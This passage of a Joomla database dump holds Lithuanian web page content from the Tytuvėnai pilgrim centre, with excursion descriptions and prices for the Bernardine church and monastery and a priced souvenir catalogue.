',1,'*',''),(179,263,'Ekskursijos','ekskursijos','','<p><strong>DIENINĖ EKSKURSIJA</strong></p>\r\n<p><img src=\"images/stories/ekskursijos/3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p>Ekskursija prasideda iš miestelio centrinės aikštės. Pro didžiuosius vartus įeiname į erdvų ir šviesų arkadinės galerijos kiemelį. Tai vienintelis Lietuvoje statinys kur šventoriaus tvoroje-arkadinėje galerijoje įrengtas procesijų koridorius su 39 Kryžiaus kelio stotimis, o kiemo viduryje Šventųjų Laiptų koplyčia. Iš šventoriaus įeisime į Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčią-tai buvusi bernardinų vienuolyno bažnyčia, ją puošia devyni barokiniai altoriai, didžiajame aktoriuje XVII a. Dievo Motinos su Kūdikiu paveikslas. Už didžiojo altoriaus įeiname į šv. Jono Pauliaus II koplyčią, kur saugoma šventojo popiežiaus relikvija. Iš koplyčios laiptais pakylame į vienuolių chorą-vienuolyno maldos vietą.</p>\r\n<p>Iš čia įeiname į vienuolyno antrąjį aukštą. Čia buvusiose vienuolių celėse dabar yra ekspozicija pasakojanti vienuolyno, bažnyčios ir miestelio istoriją. Nusileidę į pirmą aukštą apžiūrime koridorių  išpuoštą freskomis, uždarą  vienuolyno kiemelį. Vienuolyno pirmame aukšte apžiūrime reflektorių(vienuolyno valgomasis) ir virtuvę. Yra galimybė nusileisti ir į vienuolyno virtuvės rūsį, kur buvo laikomos maisto atsargos, galima apžiūrėti hipokaustinę krosnį tai - XVII a. šildymo sistemos dalis. Apžiūrėję vienuolyną išeiname į buvusį ūkinį kiemą čia matome tarnų namą, svirną, vienuolyno sodą, iš čia atsiveria vaizdas į bažnyčios apsidę mažiausiai pasikeitusią bažnyčios dalį-gotiką menančius arkinius presbiterijos langus, raudonų plytų akmenimis sutvirtintas sienas, ir statų bažnyčios stogą. Ekskursiją baigiame prie didžiųjų vienuolyno ūkinių vartų. </p>\r\n<p>Trukmė - ~1 val.</p>\r\n<p> grupei iki 10 – 20 eur, nuo 11 asm.– 30 eur;</p>\r\n<p>bilieto kaina <em>(suaugusiam žmogui)</em> – 5 eur/asm.</p>\r\n<p>bilieto kaina <em>(vaikams, senjorams, neįgaliems)</em> – 3 eur/asm.</p>\r\n<p>Ekskursija su gido paslauga užsakoma iš anksto.</p>\r\n<p> </p>\r\n<p> </p>\r\n<p><strong>NAKTINĖ EKSKURSIJA (sezonas spalio – kovo mėn.)</strong></p>\r\n<p><strong><img src=\"images/stories/ekskursijos/2.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p> <strong><em>„MIESTELIS IR VIENUOLYNAS. VAKARO SUTEMOS...“</em></strong></p>\r\n<p><span>Šnarant vakaro vėjui, girgždant durims, skraidant šikšnosparniams Tytuvėnų bažnyčios ir vienuolyno ansamblyje organizuojama naktinė ekskursija - edukacija „Miestelis ir vienuolynas. Vakaro sutemos“. </span></p>\r\n<p><span>Trukmė - 1 val.</span></p>\r\n<p>Kaina: bilieto kaina – 10 eur/asm.</p>\r\n<p>Minimalus dalyvių skaičius -  15.</p>\r\n<p>Maksimalus dalyvių skaičius – 30.</p>\r\n<p>Būtina išankstinė registracija.</p>\r\n<p><span> </span></p>\r\n<p> <strong>EKSKURSIJA PO TYTUVĖNŲ MIESTĄ</strong><strong> </strong></p>\r\n<p> <img src=\"images/stories/ekskursijos/1.jpg\" border=\"0\" width=\"300\" height=\"400\" /></p>\r\n<p><strong><em>Tytuvėnai (Šv. Jurgio kalnelis, Dievo Motinos ikonos „Kazanskaja“ cerkvė, Tytuvėnų bažnyčios ir vienuolyno ansamblis) </em></strong></p>\r\n<p><span>Šv. Jurgio kalnelis svarbi krašto istorijos vieta. Manoma, kad čia stovėjo medinė bažnyčia, kol buvo pastatyta Tytuvėnų bernardinų mūrinė bažnyčia. Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblis yra vienas didžiausių ir įdomiausių XVII–XVIII a. Lietuvoje sakralinės architektūros kompleksų. Šiame komplekse išvysime stebuklingą Švč. Dievo Motinos su kūdikiu paveikslą, Šventųjų laiptų koplyčią, Šv. Popiežiaus Jono Pauliaus II relikviją – į specialią kapsulę įdėtą kraujo lašą.</span></p>\r\n<p><span>Trukmė - 1 val.</span></p>\r\n<p><span>Gido paslauga- 30 eur;</span></p>\r\n<p><span>Kaina: bilieto kaina </span><span> – 6 eur/asm.</span></p>\r\n<p><span>Minimalus dalyvių skaičius -  15.</span></p>\r\n<p><span>Būtina išankstinė registracija.</span></p>','',1,0,0,53,'2013-05-28 10:48:08',135,'','2024-09-28 08:55:39',135,0,'0000-00-00 00:00:00','2013-05-28 10:48:08','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',40,0,4,'','',1,25040,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(180,264,'Suvenyrai','suvenyrai','','<p>Dėmesio!<br /><br />VšĮ „Tytuvėnų piligrimų centras“ prekiauja suvenyrais su Tytuvėnų simbolika ir internetu.</p>\r\n<p>Visą suvenyrų asortimentą rasite adresu mūsų internetiniame puslapyje:</p>\r\n<p>www.infotytuvenai.lt skiltyje „Suvenyrai“</p>\r\n<p>Pasirinktą suvenyrą išsiųsime registruotu paštu (paslaugos kaina 1,45€) arba per LP Express kurjerių tarnybą (paslaugos kaina 2,90 €). Didesnio kiekio ir svorio suvenyrų siuntimas derinamas individualiai.</p>\r\n<p>Norintys įsigyti suvenyrų, kreipkitės el. p. info@infotytuvenai.lt, telefonu 8 (427) 56223 arba užsukite adresu Maironio g. 2A, Tytuvėnuose.<br /><br /></p>\r\n<table style=\"width: 100%;\" border=\"0\" cellpadding=\"4\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h5>Tytuvėnų bažnyčia ir vienuolynas 400 metų.</h5>\r\n<h5>Kaina 11,60 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/400_metu{/gallery}</span></p>\r\n</td>\r\n<td>\r\n<h5>Tytuvėnai: istorija, kultūra, meno paminklai. </h5>\r\n<h5>Kaina 13,60 €</h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/istorija_kultura{/gallery}</span></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Kelmės dekanato bažnyčios ir vienuolynai.</h5>\r\n<h5>Kaina 8,70 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/kelmes_dekanato{/gallery}</span></p>\r\n</td>\r\n<td>\r\n<h5>Tytuvėnų Bernardinų bažnyčia ir vienuolynas LT/EN.</h5>\r\n<h5>Kaina 4,40 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/baznycia_ir_vienuolynas{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Albumas Šv. Brunonas.</h5>\r\n<h5>Kaina 2,90 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/brunonas{/gallery}</span></p>\r\n</td>\r\n<td>\r\n<h5>Kryžių kalno maldynas ir giesmynas.</h5>\r\n<h5>Kaina 2,90 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/kryziu_kalnu{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Kryžių kalno maldynas ir giesmynas lenkų kalba.</h5>\r\n<h5>Kaina 3,50 €</h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/gora_kryzy{/gallery}</span></h5>\r\n</td>\r\n<td>\r\n<h5>Knyga Domus est.</h5>\r\n<h5>Kaina 2,30€</h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/dominus_est{/gallery}</span></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Knyga Pašnekesys su Dievu skaitant Šventąjį Raštą.</h5>\r\n<h5>Kaina 3,50 €</h5>\r\n<p> </p>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/pasnekesys_su_dievu{/gallery}</span></h5>\r\n</td>\r\n<td>\r\n<h5>Naujasis testamentas.</h5>\r\n<h5>Kaina 5,80 €</h5>\r\n<p> </p>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/naujasis_testamentas{/gallery}</span></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Albumas Pažaislis.</h5>\r\n<h5>Kaina 8,70 € </h5>\r\n<span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/pazaislis{/gallery}</span></td>\r\n<td>\r\n<h5>Albumas Baltijos šalys LT.</h5>\r\n<h5>Kaina 8,70 € </h5>\r\n<span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/baltijos_salys{/gallery}</span></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h5>Albumas Lietuva.</h5>\r\n<h5>Kaina 8,70 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/lietuva{/gallery}</span></p>\r\n</td>\r\n<td>\r\n<h5>Medalis su klasikine kapsule.</h5>\r\n<h5>Kaina 21,70 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/medalis{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><br /><br /></p>\r\n<table style=\"width: 100%;\" border=\"0\" cellpadding=\"4\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\">\r\n<h5>Puodelis Latte </h5>\r\n<h5>Kaina 5,30 €</h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/puodelis_latte{/gallery}</span></p>\r\n</td>\r\n<td valign=\"top\">\r\n<h5>Baltas šokoladas </h5>\r\n<h5>Kaina 2,50 €</h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/baltas_sokoladas{/gallery}</span></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">\r\n<h5>Raktų pakabukas </h5>\r\n<h5>Kaina 1,20 € </h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/raktu_pakabukas{/gallery}</span></h5>\r\n</td>\r\n<td>\r\n<h5>Ženkliukas ,,Tytuvėnai\'\' </h5>\r\n<h5>Kaina 1,45 € </h5>\r\n<h5><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/zenkliukas_tytuvenai{/gallery}</span></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">\r\n<h5>Ženkliukas ,,Karūna\'\' </h5>\r\n<h5>Kaina 1,75 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/new/zenkliukas_karuna{/gallery}</span></p>\r\n</td>\r\n<td valign=\"top\">\r\n<h5>,,Vienuolyno oras\'\'</h5>\r\n<h5>Kaina 5,00 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/20151115/vienuolyno_oras{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">\r\n<h5>Šokoladas juodas</h5>\r\n<h5>Kaina 2,50 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/20151115/sokoladas_juodas{/gallery}</span></p>\r\n</td>\r\n<td valign=\"top\">\r\n<h5>Popierinis maišelis ,,Tytuvėnai\'\'</h5>\r\n<h5>Kaina 1,50 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 